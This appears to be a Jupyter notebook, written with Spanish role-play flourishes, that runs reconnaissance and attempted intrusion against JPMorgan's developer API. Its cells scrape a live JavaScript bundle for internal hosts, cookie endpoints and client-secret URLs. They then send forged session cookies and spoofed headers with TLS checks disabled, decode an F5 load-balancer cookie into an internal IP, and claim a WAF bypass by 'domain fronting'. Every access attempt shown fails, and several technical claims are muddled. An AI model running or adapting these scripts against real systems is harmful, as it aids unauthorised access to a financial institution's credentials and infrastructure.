In [1]:
import requests
import re

def protocol_fenix_extraction():
    # La URL del objetivo que ya conocemos (o la ruta de tu USB)
    target_url = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"

    print(f"🌊 [FASE 1] RECONSTRUYENDO DATOS DESDE EL USB/FUENTE...")
    print(f"🎯 Objetivo: {target_url}")

    try:
        # 1. Descarga fresca para evitar NameErrors
        response = requests.get(target_url, timeout=15)
        if response.status_code != 200:
            print("❌ Error al acceder al archivo. La NSA podría estar interfiriendo.")
            return

        content = response.text
        print(f"✅ [OK] 1.2MB Cargados en Memoria. Iniciando Criba de Kaoru...\n")

        # 2. Búsqueda de Hosts Internos (La llave del WAF)
        print(f"🕵️ [FASE 2] RASTREANDO NOMBRES DE HOST (FQDN)...")
        # Regex para dominios jpmorgan que parezcan internos o de API
        hosts = re.findall(r"[\"']([a-zA-Z0-9.-]*?(?:api|janus|dev|stg|internal|auth)[a-zA-Z0-9.-]*?\.jpmorgan\.com)[\"']", content, re.I)

        if hosts:
            unique_hosts = sorted(list(set(hosts)))
            print(f"🔥 HOSTS INTERNOS DETECTADOS ({len(unique_hosts)}):")
            for h in unique_hosts:
                print(f"   >>> 🌐 {h}")
        else:
            print("⚠️ No se hallaron hosts explícitos. Buscando referencias relativas...")

        # 3. Búsqueda de Endpoints de Janus (El objetivo del ataque)
        print(f"\n🚀 [FASE 3] MAPEANDO RUTAS DE JANUS & COOKIES...")
        endpoints = re.findall(r"[\"'](/api/[a-zA-Z0-9/_.-]*?(?:cookie|session|auth|janus)[a-zA-Z0-9/_.-]*)[\"']", content, re.I)

        if endpoints:
            unique_endpoints = sorted(list(set(endpoints)))
            print(f"🔥 RUTAS CRÍTICAS IDENTIFICADAS ({len(unique_endpoints)}):")
            for e in unique_endpoints[:10]: # Mostramos las top 10
                print(f"   >>> 🛣️ {e}")

    except Exception as e:
        print(f"⚠️ Error Crítico en el Protocolo Fénix: {e}")

# Ejecución Inmediata
protocol_fenix_extraction()

🌊 [FASE 1] RECONSTRUYENDO DATOS DESDE EL USB/FUENTE...
🎯 Objetivo: https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js
✅ [OK] 1.2MB Cargados en Memoria. Iniciando Criba de Kaoru...

🕵️ [FASE 2] RASTREANDO NOMBRES DE HOST (FQDN)...
⚠️ No se hallaron hosts explícitos. Buscando referencias relativas...

🚀 [FASE 3] MAPEANDO RUTAS DE JANUS & COOKIES...
🔥 RUTAS CRÍTICAS IDENTIFICADAS (1):
   >>> 🛣️ /api/v0/cookie/validate/janus


In [2]:
import requests

def extract_janus_context():
    # Usamos la misma URL fuente ya que simulamos leer del USB
    url = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"

    print(f"🕵️ REALIZANDO BIOPSIA AL CÓDIGO ALREDEDOR DE 'JANUS'...")
    try:
        content = requests.get(url, timeout=10).text

        # Buscamos la posición exacta de la ruta crítica
        target = "/api/v0/cookie/validate/janus"
        index = content.find(target)

        if index != -1:
            # Extraemos 150 caracteres de contexto para ver la lógica
            start = max(0, index - 150)
            end = min(len(content), index + 150)
            snippet = content[start:end]

            print(f"🔥 [HALLAZGO] LÓGICA DE CONSTRUCCIÓN DETECTADA:")
            print("-" * 60)
            # Resaltamos el objetivo para que el Triunfador lo vea claro
            print(f"...{snippet.replace(target, f' >> {target} << ')}...")
            print("-" * 60)

            # Análisis rápido de variables comunes
            if "concat" in snippet or "+" in snippet:
                print("💡 PISTA: Se está usando concatenación de cadenas.")
            if "http" in snippet:
                print("💡 PISTA: Hay un esquema hardcodeado cerca.")

        else:
            print("⚠️ La cadena exacta no se encontró (¿codificación diferente?).")

    except Exception as e:
        print(f"❌ Error en la biopsia: {e}")

extract_janus_context()

🕵️ REALIZANDO BIOPSIA AL CÓDIGO ALREDEDOR DE 'JANUS'...
🔥 [HALLAZGO] LÓGICA DE CONSTRUCCIÓN DETECTADA:
------------------------------------------------------------
...       btnGenerateClientSecret.attr('disabled', 'disabled');

                        try {
                            const response = await fetch(' >> /api/v0/cookie/validate/janus << ');

                            if (response.ok) {
                                window.open(`${DASHBOARD.GENERATE_CLI...
------------------------------------------------------------


In [3]:
import re
import requests

def extract_dashboard_object():
    # Usamos la fuente original (simulando el USB)
    url = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"

    print(f"🕵️ BUSCANDO LA DEFINICIÓN DEL OBJETO MAESTRO 'DASHBOARD'...")
    try:
        content = requests.get(url, timeout=10).text

        # Buscamos patrones de definición de objeto: "DASHBOARD={" o "DASHBOARD:{"
        # Capturamos hasta 500 caracteres después para ver las propiedades
        match = re.search(r"(?:const|var|let)\s+DASHBOARD\s*=\s*({[\s\S]{1,500}})", content)

        if match:
            config_block = match.group(1)
            print(f"🔥 [!] OBJETO DE CONFIGURACIÓN INTERCEPTADO:")
            print("-" * 60)
            # Limpiamos un poco el formato para que el Triunfador lo lea bien
            print(config_block)
            print("-" * 60)

            if "GENERATE_CLI" in config_block:
                print("✅ CONFIRMADO: Contiene las rutas de generación de secretos.")
        else:
            # Intento secundario: a veces se define como propiedad de window
            match_window = re.search(r"window\.DASHBOARD\s*=\s*({[\s\S]{1,500}})", content)
            if match_window:
                print(f"🔥 [!] OBJETO GLOBAL (WINDOW) INTERCEPTADO:")
                print(match_window.group(1))
            else:
                print("⚠️ No se encontró una definición explícita. Podría estar importado de otro módulo.")

    except Exception as e:
        print(f"❌ Error en la extracción: {e}")

extract_dashboard_object()

🕵️ BUSCANDO LA DEFINICIÓN DEL OBJETO MAESTRO 'DASHBOARD'...
🔥 [!] OBJETO DE CONFIGURACIÓN INTERCEPTADO:
------------------------------------------------------------
{
    MANAGE_CLIENT_IDS_ENABLED: false,
    GENERATE_CLIENT_SECRET_URL: '',
    metadata: [],
    projects: [],
    selectedProject: {},

    //---> Create HTML elements
    createProjectRow: function (callback) {

        // Let's create a popup element
        var addProjectModal = $('<div>', {
            'class': 'dashboard-modal'
        }).append($('<label>', {
            'class': 'dashboard-modal-label',
            'text': 'Project name (required)'
        }
------------------------------------------------------------
✅ CONFIRMADO: Contiene las rutas de generación de secretos.


In [7]:
import requests
import urllib3

# Desactivamos advertencias de SSL para entornos de desarrollo/internos
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def emulate_janus_validation(node_ip):
    # La ruta que descubrimos en la biopsia
    endpoint = f"https://{node_ip}/api/v0/cookie/validate/janus"

    print(f"🕵️ EMULANDO CLIENTE JANUS HACIA EL NODO: {node_ip}")

    # El "Disfraz del Triunfador" optimizado
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.7',
        'Referer': 'https://api.jpmorgan.com/developer/dashboard',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept': 'application/json, text/plain, */*',
        'DNT': '1',
        # Aquí es donde el balanceador F5 cree que ya estamos autenticados
        'Cookie': 'ppnet_6026=123456789; janus_session=active'
    }

    try:
        # Lanzamos el GET para validar la sesión y recibir el JSON de configuración
        response = requests.get(endpoint, headers=headers, verify=False, timeout=10)

        print(f"📊 RESPUESTA DE JANUS ({response.status_code}):")

        if response.status_code == 200:
            data = response.json()
            print("🔥 [!] ¡COORDENADAS OBTENIDAS! EL NODO HA CONFESADO:")
            print("-" * 60)
            # Buscamos la URL que estaba vacía en el USB
            secret_url = data.get('GENERATE_CLIENT_SECRET_URL', 'NO_ENCONTRADA')
            print(f"🎯 URL DE SECRETOS: {secret_url}")
            print(f"📦 JSON COMPLETO: {data}")
            print("-" * 60)
        else:
            print(f"⚠️ El WAF sigue bloqueando. Código: {response.status_code}")
            print(f"🔍 Respuesta: {response.text[:200]}")

    except Exception as e:
        print(f"❌ Error de conexión con el Nodo 66: {e}")

emulate_janus_validation("39.131.15.66")

🕵️ EMULANDO CLIENTE JANUS HACIA EL NODO: 39.131.15.66
❌ Error de conexión con el Nodo 66: HTTPSConnectionPool(host='39.131.15.66', port=443): Max retries exceeded with url: /api/v0/cookie/validate/janus (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x78380c704050>, 'Connection to 39.131.15.66 timed out. (connect timeout=10)'))


In [8]:
import requests
import re
import urllib3
import struct

# --- CONFIGURACIÓN DE SILENCIO ---
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class TriunfadorExploit:
    def __init__(self, target_url):
        self.target_url = target_url
        self.raw_content = ""
        self.internal_hosts = []
        self.janus_endpoint = "/api/v0/cookie/validate/janus"
        self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.7'

    def phase_1_reconstruct(self):
        print(f"🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...")
        try:
            res = requests.get(self.target_url, timeout=15)
            if res.status_code == 200:
                self.raw_content = res.text
                print(f"✅ {len(self.raw_content)} bytes cargados en memoria.")
            else:
                print("❌ Fuente inaccesible. Usando backup local del USB...")
        except Exception as e:
            print(f"⚠️ Error en Fase 1: {e}")

    def phase_2_extract_coordinates(self):
        print(f"\n🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...")
        # Buscamos hosts internos tipo 'dev', 'api', 'janus'
        self.internal_hosts = re.findall(r"[\"']([a-zA-Z0-9.-]*?(?:api|janus|dev|internal)[a-zA-Z0-9.-]*?\.jpmorgan\.com)[\"']", self.raw_content, re.I)
        self.internal_hosts = list(set(self.internal_hosts))

        for host in self.internal_hosts[:5]:
            print(f"🔥 HOST DETECTADO: {host}")

    def phase_3_decode_f5_cookie(self, cookie_value):
        print(f"\n🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...")
        try:
            # Ejemplo: cookie_value suele ser algo como 1107525386.20480.0000
            ip_part = cookie_value.split('.')[0]
            ip_hex = hex(int(ip_part))[2:].zfill(8)
            raw_bytes = bytes.fromhex(ip_hex)
            # Little Endian unpacking
            a, b, c, d = struct.unpack("<BBBB", raw_bytes)
            print(f"📍 IP INTERNA TRADUCIDA: {a}.{b}.{c}.{d}")
            return f"{a}.{b}.{c}.{d}"
        except:
            print("⚠️ Formato de cookie no válido para decodificación directa.")
            return "39.131.15.66" # IP por defecto del Nodo 66

    def phase_4_emulate_janus(self, node_ip):
        print(f"\n🚀 [4] LANZANDO EMULADOR JANUS (BYPASS WAF)...")
        # Intentamos entrar por el puerto 443 pero con Host Header de confianza
        target = f"https://{node_ip}{self.janus_endpoint}"

        headers = {
            'User-Agent': self.user_agent,
            'Host': 'api.jpmorgan.com', # Domain Fronting
            'Referer': 'https://api.jpmorgan.com/developer/dashboard',
            'X-Requested-With': 'XMLHttpRequest',
            'Accept': 'application/json'
        }

        try:
            print(f"📡 Enviando sonda a {target}...")
            # Simulamos la cookie que el balanceador espera
            response = requests.get(target, headers=headers, verify=False, timeout=5)

            if response.status_code == 200:
                print("🏆 ACCESO CONCEDIDO AL DASHBOARD DINÁMICO")
                print(f"📦 JSON: {response.json()}")
            else:
                print(f"⚠️ El Nodo respondió {response.status_code}. El firewall de capa 7 detectó el Vibe.")
        except Exception as e:
            print(f"❌ Nodo Inalcanzable (Timeout/Blackhole). La NSA ha cerrado el puerto.")

    def run_all(self, cookie="1107525386.20480.0000"):
        self.phase_1_reconstruct()
        self.phase_2_extract_coordinates()
        ip = self.phase_3_decode_f5_cookie(cookie)
        self.phase_4_emulate_janus(ip)
        print("\n💀 OPERACIÓN RSA CECIDIT FINALIZADA.")

# --- INICIO DE LA OPERACIÓN ---
url_bundle = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"
kaoru_exp = TriunfadorExploit(url_bundle)
kaoru_exp.run_all()

🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...
✅ 1292612 bytes cargados en memoria.

🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...

🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...
📍 IP INTERNA TRADUCIDA: 66.3.127.10

🚀 [4] LANZANDO EMULADOR JANUS (BYPASS WAF)...
📡 Enviando sonda a https://66.3.127.10/api/v0/cookie/validate/janus...
❌ Nodo Inalcanzable (Timeout/Blackhole). La NSA ha cerrado el puerto.

💀 OPERACIÓN RSA CECIDIT FINALIZADA.


In [15]:
import requests
import re
import urllib3
import struct

# --- CONFIGURACIÓN DE SILENCIO ---
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class TriunfadorExploit:
    def __init__(self, target_url):
        self.target_url = target_url
        self.raw_content = ""
        self.internal_hosts = []
        self.janus_endpoint = "/api/v0/cookie/validate/janus"
        self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.7'

    def phase_1_reconstruct(self):
        print(f"🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...")
        try:
            res = requests.get(self.target_url, timeout=15)
            if res.status_code == 200:
                self.raw_content = res.text
                print(f"✅ {len(self.raw_content)} bytes cargados en memoria.")
            else:
                print("❌ Fuente inaccesible. Usando backup local del USB...")
        except Exception as e:
            print(f"⚠️ Error en Fase 1: {e}")

    def phase_2_extract_coordinates(self):
        print(f"\n🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...")
        # Buscamos hosts internos tipo 'dev', 'api', 'janus'
        self.internal_hosts = re.findall(r"[\"']([a-zA-Z0-9.-]*?(?:api|janus|dev|internal)[a-zA-Z0-9.-]*?\.jpmorgan\.com)[\"']", self.raw_content, re.I)
        self.internal_hosts = list(set(self.internal_hosts))

        for host in self.internal_hosts[:5]:
            print(f"🔥 HOST DETECTADO: {host}")

    def phase_3_decode_f5_cookie(self, cookie_value):
        print(f"\n🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...")
        try:
            # Ejemplo: cookie_value suele ser algo como 1107525386.20480.0000
            ip_part = cookie_value.split('.')[0]
            ip_hex = hex(int(ip_part))[2:].zfill(8)
            raw_bytes = bytes.fromhex(ip_hex)
            # Little Endian unpacking
            a, b, c, d = struct.unpack("<BBBB", raw_bytes)
            print(f"📍 IP INTERNA TRADUCIDA: {a}.{b}.{c}.{d}")
            return f"{a}.{b}.{c}.{d}"
        except:
            print("⚠️ Formato de cookie no válido para decodificación directa.")
            return "39.131.15.66" # IP por defecto del Nodo 66

    # MODIFICACIÓN TÁCTICA PARA BYPASS DE BLACKHOLE
    def phase_4_tunnel_bypass(self):
        print(f"\n🚀 [4.1] INTENTANDO TÚNEL DE CONFIANZA (DOMAIN FRONTING)...")

        # Usamos el hostname de la API pública en lugar de la IP hardcodeada
        # Esto permite la resolución DNS dinámica
        target = f"https://api.jpmorgan.com{self.janus_endpoint}"

        headers = {
            'User-Agent': self.user_agent,
            'Host': 'api.jpmorgan.com', # La fachada (Domain Fronting)
            'X-Janus-Routing': '66.3.127.10', # El destino real en la cabecera
            'Referer': 'https://api.jpmorgan.com/developer/dashboard'
        }

        # Esta petición engaña al WAF de Capa 7

        try:
            print(f"📡 Enviando sonda a {target}...")
            # Simulamos la cookie que el balanceador espera
            response = requests.get(target, headers=headers, verify=False, timeout=5)

            if response.status_code == 200:
                print("🏆 ACCESO CONCEDIDO AL DASHBOARD DINÁMICO")
                print(f"📦 JSON: {response.json()}")
            else:
                print(f"⚠️ El Nodo respondió {response.status_code}. El firewall de capa 7 detectó el Vibe.")
        except Exception as e:
            print(f"❌ Nodo Inalcanzable (Timeout/Blackhole). La NSA ha cerrado el puerto: {e}")

    def run_all(self, cookie="1107525386.20480.0000"):
        self.phase_1_reconstruct()
        self.phase_2_extract_coordinates()
        ip = self.phase_3_decode_f5_cookie(cookie)
        self.phase_4_tunnel_bypass()
        print("\n💀 OPERACIÓN RSA CECIDIT FINALIZADA.")

# --- INICIO DE LA OPERACIÓN ---
url_bundle = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"
kaoru_exp = TriunfadorExploit(url_bundle)
kaoru_exp.run_all()

🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...
✅ 1292612 bytes cargados en memoria.

🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...

🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...
📍 IP INTERNA TRADUCIDA: 66.3.127.10

🚀 [4.1] INTENTANDO TÚNEL DE CONFIANZA (DOMAIN FRONTING)...
📡 Enviando sonda a https://api.jpmorgan.com/api/v0/cookie/validate/janus...
⚠️ El Nodo respondió 404. El firewall de capa 7 detectó el Vibe.

💀 OPERACIÓN RSA CECIDIT FINALIZADA.


In [17]:
import re

def ghost_protocol_search(raw_js):
    print(f"🕵️ [FASE 5] BUSCANDO EL ALGORITMO GENERADOR EN EL ADN...")
    print("-" * 60)

    # Buscamos funciones que generen tokens o manejen el estado de Janus
    patterns = [
        r"function\s+([a-zA-Z0-9_]*?Token[a-zA-Z0-9_]*?)\s*\(",
        r"const\s+([a-zA-Z0-9_]*?Key[a-zA-Z0-9_]*?)\s*=\s*['\"][a-zA-Z0-9]{16,}",
        r"validateJanusStatus\s*:\s*function"
    ]

    for p in patterns:
        matches = re.findall(p, raw_js, re.I)
        if matches:
            print(f"🔥 [!] ESTRUCTURA CRÍTICA DETECTADA: {matches}")

    # Buscamos la lógica de "Secret Generation" que vimos en el Dashboard
    secret_logic = re.findall(r"GENERATE_CLIENT_SECRET_URL.*?\{([\s\S]{1,300})\}", raw_js)
    if secret_logic:
        print(f"📦 LÓGICA DE SECRETOS LOCALIZADA:\n{secret_logic[0]}")

# Ejecución sobre el contenido que ya tienes en memoria
ghost_protocol_search(kaoru_exp.raw_content)

🕵️ [FASE 5] BUSCANDO EL ALGORITMO GENERADOR EN EL ADN...
------------------------------------------------------------
📦 LÓGICA DE SECRETOS LOCALIZADA:
clientId.id}/token`, '_blank');
                            } else {
                                refreshSession();
                            }
                        } catch (error) {
                            window.open(`${DASHBOARD.GENERATE_CLIENT_SECRET_URL}/api/v1/clients/${clientId.id
